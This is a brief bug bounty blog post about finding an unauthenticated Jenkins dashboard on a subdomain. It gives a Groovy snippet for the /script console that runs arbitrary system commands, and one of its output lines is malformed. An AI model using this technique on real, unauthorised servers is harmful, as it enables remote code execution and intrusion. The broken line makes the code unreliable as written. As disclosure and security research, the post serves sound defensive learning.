DEV Community

Cover image for Remote Code Execution on subdomain

Remote Code Execution on subdomain

Khaled Nassar
Web Developer | Part Time Bug Bounty Hunter- I use VIM btw -
・1 min read

i've found Jenkins on does not require authentication for access dashboard

what can i do with this .?

everything , add/delete admin accounts,service,configuration,etc ..

but the intersing path is /script , you can write Jenkins script
so you can write script for execute system commands

def command = "YOUR_COMMAND"
def proc = command.execute()
println "Process exit code: ${proc.exitValue()}"
println "Std Err: ${proc.err.text}"
println "Std Out: ${}"
Enter fullscreen mode Exit fullscreen mode


Discussion (0)